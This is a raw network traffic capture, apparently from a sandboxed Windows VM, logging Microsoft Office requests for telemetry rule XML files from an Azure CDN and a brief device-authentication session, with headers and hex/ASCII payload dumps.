90	192.168.2.5	49806	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:42 UTC	192	OUT	GET /rules/rule701201v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:42 UTC	538	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:42 GMT Content-Type: text/xml Content-Length: 1393 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT ETag: "0x8DC582BE3E55B6E" x-ms-request-id: 4e98fbea-b01e-0002-08d2-2c1b8f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163142Z-16547b76f7fnlcwwhC1DFWz6gw00000003zg00000000fcxn x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:42 UTC	1393	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"

Session ID	Source IP	Source Port	Destination IP	Destination Port
91	192.168.2.5	49807	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:42 UTC	192	OUT	GET /rules/rule701200v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:42 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:42 GMT Content-Type: text/xml Content-Length: 1356 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT ETag: "0x8DC582BDC681E17" x-ms-request-id: 6a3542ff-401e-0078-3058-2e4d34000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163142Z-15869dbbcc6pfq2ghC1DFW0bk000000003xg000000000cy3 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:42 UTC	1356	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
92	192.168.2.5	49808	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:42 UTC	192	OUT	GET /rules/rule700201v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:42 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:42 GMT Content-Type: text/xml Content-Length: 1393 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT ETag: "0x8DC582BE39DFC9B" x-ms-request-id: 62df1b9b-201e-003c-105c-2e30f9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163142Z-r159446fcd7t7gwchC1DFWyh4000000004h000000000brcb x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:42 UTC	1393	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"

Session ID	Source IP	Source Port	Destination IP	Destination Port
93	192.168.2.5	49809	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:42 UTC	192	OUT	GET /rules/rule700200v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:43 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:43 GMT Content-Type: text/xml Content-Length: 1356 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT ETag: "0x8DC582BDF66E42D" x-ms-request-id: 0a7a2944-a01e-0002-6858-2e5074000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163143Z-176bd8f9bc5pzj8phC1DFWsz3000000005ug000000003mmv x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:43 UTC	1356	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
94	192.168.2.5	49810	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:43 UTC	192	OUT	GET /rules/rule702351v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:43 UTC	517	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:43 GMT Content-Type: text/xml Content-Length: 1395 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BE017CAD3" x-ms-request-id: 3caab4b0-601e-005c-26d2-2cf06f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163143Z-16547b76f7fxsvjdhC1DFWprrs00000003x0000000001dp1 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:43 UTC	1395	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic

Session ID	Source IP	Source Port	Destination IP	Destination Port
95	192.168.2.5	49812	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:43 UTC	192	OUT	GET /rules/rule702350v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:43 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:43 GMT Content-Type: text/xml Content-Length: 1358 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT ETag: "0x8DC582BE6431446" x-ms-request-id: 641effa3-501e-005b-0c5f-2ed7f7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163143Z-176bd8f9bc5dfnrlhC1DFW9ueg00000005t0000000001ymq x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:43 UTC	1358	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
96	192.168.2.5	49813	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:43 UTC	192	OUT	GET /rules/rule701251v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:43 UTC	515	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:43 GMT Content-Type: text/xml Content-Length: 1395 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT ETag: "0x8DC582BDE12A98D" x-ms-request-id: 34ab5445-001e-0079-1b58-2e12e8000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163143Z-r159446fcd77fkjdhC1DFWk94c00000004zg000000000p9t x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-04 16:31:43 UTC	1395	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi

Session ID	Source IP	Source Port	Destination IP	Destination Port
97	192.168.2.5	49811	40.115.3.253	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:43 UTC	70	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 34 0d 0a 4d 53 2d 43 56 3a 20 30 5a 37 42 33 67 54 51 47 6b 65 2b 6b 31 4c 64 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 30 35 34 61 61 65 35 36 66 35 62 38 62 30 0d 0a 0d 0a Data Ascii: CNT 1 CON 304MS-CV: 0Z7B3gTQGke+k1Ld.1Context: b054aae56f5b8b0
2024-11-04 16:31:43 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-11-04 16:31:43 UTC	1083	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 30 0d 0a 4d 53 2d 43 56 3a 20 30 5a 37 42 33 67 54 51 47 6b 65 2b 6b 31 4c 64 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 30 35 34 61 61 65 35 36 66 35 62 38 62 30 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 51 6e 50 35 6e 79 30 73 4f 50 46 38 2f 39 73 66 6b 6b 38 39 4a 49 68 73 36 7a 75 59 33 54 4c 6a 75 30 65 6d 73 75 46 63 42 6e 7a 37 38 4b 75 4f 38 55 75 44 74 45 35 6b 53 35 57 7a 4b 72 59 62 46 41 6d 30 2b 69 35 59 47 65 7a 35 6b 70 78 7a 48 67 50 30 57 67 77 53 71 32 4b 58 35 76 37 69 79 51 51 43 42 64 65 77 6a 45 45 36 4c 72 Data Ascii: ATH 2 CON\DEVICE 1060MS-CV: 0Z7B3gTQGke+k1Ld.2Context: b054aae56f5b8b0<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAQnP5ny0sOPF8/9sfkk89JIhs6zuY3TLju0emsuFcBnz78KuO8UuDtE5kS5WzKrYbFAm0+i5YGez5kpxzHgP0WgwSq2KX5v7iyQQCBdewjEE6Lr
2024-11-04 16:31:43 UTC	73	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 35 0d 0a 4d 53 2d 43 56 3a 20 30 5a 37 42 33 67 54 51 47 6b 65 2b 6b 31 4c 64 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 30 35 34 61 61 65 35 36 66 35 62 38 62 30 0d 0a 0d 0a Data Ascii: BND 3 CON\QOS 55MS-CV: 0Z7B3gTQGke+k1Ld.3Context: b054aae56f5b8b0
2024-11-04 16:31:43 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-11-04 16:31:43 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 33 49 79 47 35 65 30 76 33 30 69 5a 51 65 6a 39 63 73 33 6c 7a 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: 3IyG5e0v30iZQej9cs3lzQ.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
98	192.168.2.5	49814	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:43 UTC	192	OUT	GET /rules/rule701250v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:44 UTC	517	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:43 GMT Content-Type: text/xml Content-Length: 1358 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT ETag: "0x8DC582BE022ECC5" x-ms-request-id: 70b2909d-801e-00ac-33c1-2cfd65000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163143Z-16547b76f7fnm7lfhC1DFWkxt400000003t000000000ggqv x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:44 UTC	1358	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">

Session ID	Source IP	Source Port	Destination IP	Destination Port
99	192.168.2.5	49815	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:44 UTC	192	OUT	GET /rules/rule700051v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:44 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:44 GMT Content-Type: text/xml Content-Length: 1389 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT ETag: "0x8DC582BE10A6BC1" x-ms-request-id: 9b184377-001e-0014-055f-2e5151000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163144Z-15869dbbcc6m5ms4hC1DFWx02800000003v000000000dszk x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:44 UTC	1389	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="

Session ID	Source IP	Source Port	Destination IP	Destination Port
100	192.168.2.5	49816	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:44 UTC	192	OUT	GET /rules/rule700050v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:44 UTC	517	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:44 GMT Content-Type: text/xml Content-Length: 1352 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT ETag: "0x8DC582BE9DEEE28" x-ms-request-id: 96da997d-001e-0028-355d-2cc49f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163144Z-16547b76f7fnm7lfhC1DFWkxt400000003qg00000000syg6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
